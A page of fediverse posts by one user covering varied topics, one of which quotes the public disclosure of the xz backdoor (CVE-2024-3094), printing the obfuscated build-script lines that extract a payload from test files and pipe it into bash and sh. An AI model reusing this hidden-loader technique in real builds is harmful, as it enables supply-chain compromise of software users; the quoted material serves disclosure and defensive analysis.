Notices by tk (tk@f.kawa-kun.com), page 4
-
Embed this notice
tk (tk@f.kawa-kun.com)'s status on Saturday, 30-Mar-2024 09:07:04 JST 
tk
@Moon @mikoto Seems to be a problem with Postgres, but I'm not seeing any tell-tale logs. -
Embed this notice
tk (tk@f.kawa-kun.com)'s status on Saturday, 30-Mar-2024 09:04:28 JST
tk
@Moon @mikoto My #Pleroma instance is shitting itself now. :( -
Embed this notice
tk (tk@f.kawa-kun.com)'s status on Saturday, 30-Mar-2024 01:58:10 JST
tk
Looks like we have a new #xz vulnerability (backdoor):
XZ Struck By Malicious Code That Could Allow Unauthorized Remote System AccessRed Hat today issued an "urgent security alert" for Fedora 41 and Fedora Rawhide users over XZ. Yes, the XZ tools and libraries for this compression format. Some malicious code was added to XZ 5.6.0/5.6.1 that could allow unauthorized remote system access.Red Hat cites CVE-2024-3094 for this XZ security vulnerability due to malicious code making it into the codebase. I haven't seen CVE-2024-3094 made public yet but the Red Hat security alert sums it up as…
From this mailing list thread:
Compromised Release Tarball[quote]One portion of the backdoor is solely in the distributed tarballs. For easier reference, here's a link to debian's import of the tarball, but it is also present in the tarballs for 5.6.0 and 5.6.1:
salsa.debian.org/debian/xz-uti…
That line is *not* in the upstream source of build-to-host, nor is build-to-host used by xz in git. However, it is present in the tarballs released upstream, except for the "source code" links, which I think github generates directly from the repository contents:
This injects an obfuscated script to be executed at the end of configure. This script is fairly obfuscated and data from "test" .xz files in the repository.
am__test = bad-3-corrupt_lzma2.xz ... am__test_dir=$(top_srcdir)/tests/files/$(am__test) ... sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1
This script is executed and, if some preconditions match, modifies $builddir/src/liblzma/Makefile to contain
...; sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr " \-_" " _\-" | xz -d | /bin/bash >/dev/null 2>&1; ...
which ends up asLeaving out the "| bash" that produces
####Hello#### #��Z�.hj� eval `grep ^srcdir= config.status` if test -f ../../config.status;then eval `grep ^srcdir= ../../config.status` srcdir="../../$srcdir" fi export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh ####World####After de-obfuscation this leads to the attached injected.txt.
Compromised RepositoryThe files containing the bulk of the exploit are in an obfuscated form in
- tests/files/bad-3-corrupt_lzma2.xz
- tests/files/good-large_compressed.lzma
committed upstream. They were initially added in github.com/tukaani-project/xz/…
Note that the files were not even used for any "tests" in 5.6.0.
Subsequently the injected code (more about that below) caused valgrind errors and crashes in some configurations, due the stack layout differing from what the backdoor was expecting. These issues were attempted to be worked around in 5.6.1:
For which the exploit code was then adjusted:
github.com/tukaani-project/xz/…
Given the activity over several weeks, the committer is either directly involved or there was some quite severe compromise of their system. Unfortunately the latter looks like the less likely explanation, given they communicated on various lists about the "fixes" mentioned above.
Florian Weimer first extracted the injected code in isolation, also attached, liblzma_la-crc64-fast.o, I had only looked at the whole binary. Thanks!
-
Embed this notice
tk (tk@f.kawa-kun.com)'s status on Monday, 25-Mar-2024 04:52:09 JST
tk
@ariadne Most late model trucks today are terrible for doing real truck things. :P -
Embed this notice
tk (tk@f.kawa-kun.com)'s status on Saturday, 23-Mar-2024 22:48:08 JST
tk
@eniko Is COVID as bad as atmospheric lead poisoning from leaded gas? 🙃 -
Embed this notice
tk (tk@f.kawa-kun.com)'s status on Saturday, 23-Mar-2024 22:42:37 JST
tk
♲ @gander22h@diasp.org:#Caturday #cat #cats and #AI all in one #meme -
Embed this notice
tk (tk@f.kawa-kun.com)'s status on Friday, 22-Mar-2024 21:12:32 JST
tk
♲ @beaubobobonobo@diaspora.psyco.fr:♲ @whuffo@diasp.org:
(www.youtube.com/watch?v=YVTmax…)
Another Psychiatrist Says Trump's Dementia Is ObviousHe's really not capable of holding office.
-
Embed this notice
tk (tk@f.kawa-kun.com)'s status on Sunday, 10-Mar-2024 06:29:06 JST
tk
@rafal06 @fluffykittycat They're making their products shittier to attempt to get the consumer to pay more, to appease the shareholders—their true customers—by increasing profit margins. Unfortunately for them, that doesn't work on informed consumers, of which their are plenty thanks to the free flow of information on the Internet. :) -
Embed this notice
tk (tk@f.kawa-kun.com)'s status on Friday, 23-Feb-2024 12:50:36 JST
tk
People complain about how long rail transit projects take to build, but highway projects usual take even longer!
-
Embed this notice
tk (tk@f.kawa-kun.com)'s status on Friday, 02-Feb-2024 08:27:47 JST
tk
♲ @gander22h@diasp.org:LibreOffice 24.2
#LibreOffice has changed its numbering system to a YY.M format instead. The first of the new system is LibreOffice 24.2. The last of the old system is 7.6.4 -
Embed this notice
tk (tk@f.kawa-kun.com)'s status on Friday, 19-Jan-2024 09:06:37 JST
tk
♲ @gander22h@diasp.org:Are cellphone bans in schools a good idea? Experts weigh in
“In Canada and other developed countries, scores in reading, math and science are on a steady decline,” said Maharaj.“When [scientists] look at what’s contributing to this, the use of phones and digital technology is a significant factor.”
Cris Rowan, a B.C.-based occupational therapist, added that phone use is impacting children's brain development and impacting their focus in class.
“Research is showing that grades are directly related to the number of times you open a text.... Even having that phone on the desk is hugely affecting kids.”
Both experts say cellphones in class are also likely contributing to an ongoing decrease in kid and teen mental health.
Experts also say that cellphones in class have a negative impact by increasing opportunities for cyberbullying.
-
Embed this notice
tk (tk@f.kawa-kun.com)'s status on Saturday, 13-Jan-2024 06:12:26 JST
tk
♲ @powerbook5300@diasp.org:♲ @joyce_donahue@diasp.org:
(Boomer joke.) -
Embed this notice
tk (tk@f.kawa-kun.com)'s status on Thursday, 11-Jan-2024 13:54:54 JST
tk
@BalooUriza @Elizafox The Seattle natives have been trained well by the individualism narrative. Being scared of everyone is the logical conclusion. :/ -
Embed this notice
tk (tk@f.kawa-kun.com)'s status on Wednesday, 10-Jan-2024 03:26:03 JST
tk
♲ @999@diasporasocial.net:Scientists find about a quarter million invisible nanoplastic particles in a liter of bottled water apnews.com/article/plastic-nan… -
Embed this notice
tk (tk@f.kawa-kun.com)'s status on Thursday, 04-Jan-2024 04:25:41 JST
tk
♲ @gunnar@diasp.org:♲ @bleeping_computer@nota.404.mn:
Nearly 11 million SSH servers vulnerable to new Terrapin attacks
#security #bleeping computer #bleepingcomputer #computers #technology #news #education #updates #tech
generated by pod_feeder_v2 -
Embed this notice
tk (tk@f.kawa-kun.com)'s status on Monday, 01-Jan-2024 11:28:21 JST
tk
♲ @rebelhq@diasporasocial.net:Globalization is Crumbling: Time for Domestic Self-Sufficiency in 2024 www.counterpunch.org/2023/12/2…
The decades-long attempt to force “globalization” as the primary economic model is crumbling. We saw it coming when the pandemic hit and suddenly “global supply chains” failed, leaving those relying on them in dire straits. Now, as clusters of war spread across the planet, once again the supply chains are broken like the fragile, artificial constructs they are. -
Embed this notice
tk (tk@f.kawa-kun.com)'s status on Monday, 01-Jan-2024 02:52:20 JST
tk
@SebinNyshkim I feel like this is unfortunately the logical continuation of things like:
- Automation in general, in both robotic and software forms
- Things being turned into unmaintainable/unrepairable black boxes
- Automatic transmissions in cars
The people producing and pushing this stuff want us to become slaves to them rather than learning how to do things ourselves. It's definitely "working," too, because much of the population is too scared to work on their own things, and is even scared of "having to use" hand/power tools to do anything. -
Embed this notice
tk (tk@f.kawa-kun.com)'s status on Wednesday, 27-Dec-2023 02:51:34 JST
tk
@RedForkian The funny thing is that point-and-shoot cameras are smaller than today's smartphones, so you might as well start carrying one if you don't want all of the smartphone surveillance and other nonsense. -
Embed this notice
tk (tk@f.kawa-kun.com)'s status on Wednesday, 06-Dec-2023 08:51:17 JST
tk
What are some things you hate doing that everyone else does with seemingly few gripes?
-
Embed this notice
tk (tk@f.kawa-kun.com)'s status on Friday, 17-Nov-2023 01:31:45 JST
tk
♲ @gander22h@diasp.org:Selling your vehicle? Watch out for this scam growing in popularity
An Ottawa woman is warning people who are selling their vehicle to be wary of scammers who try to lure sellers into purchasing vehicle history reports through fraudulent websites in order to obtain their credit card information.
Another new #scam to watch out for:Ellen Thompson says she was encouraged by the large number of responses to an ad she posted on AutoTrader to sell her son's 2011 Honda CR-Z.
"The first day I was inundated with interested people and I thought 'Oh, this is crazy,'" says Thompson. "I couldn't even keep up to the interest."
Thompson had already paid for a vehicle history report for the pending sale, but she estimates nine out of every 10 text messages she received from potential buyers led to the same request for a vehicle history report from a different company.
All GNU social JP content and data are available under the